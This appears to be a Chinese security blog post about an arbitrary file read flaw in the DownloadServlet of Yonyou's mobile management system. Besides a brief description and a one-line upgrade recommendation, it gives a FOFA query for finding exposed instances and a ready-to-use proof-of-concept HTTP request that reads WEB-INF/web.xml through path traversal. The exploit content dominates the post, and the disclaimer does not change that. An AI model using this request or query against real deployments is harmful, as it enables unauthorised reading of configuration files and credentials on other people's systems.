用友移动管理系统 DownloadServlet 任意文件读取漏洞

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。

用友移动管理系统DownloadServlet存在任意文件读取漏洞,恶意攻击者可能会利用此漏洞读取敏感文件,对系统造成危害

Ⅱ、fofa语句

app="用友-移动系统管理"

Ⅲ、漏洞复现

POC

GET /servlet/~maportal/;/com.yonyou.maportal.bs.padplugin.controller.DownloadServlet?filename=../../WEB-INF/web.xml HTTP/1.1
Host:127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

1、构建poc

Ⅳ、Nuclei-POC

Ⅴ、修复建议

升级至安全版本

  • 11
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值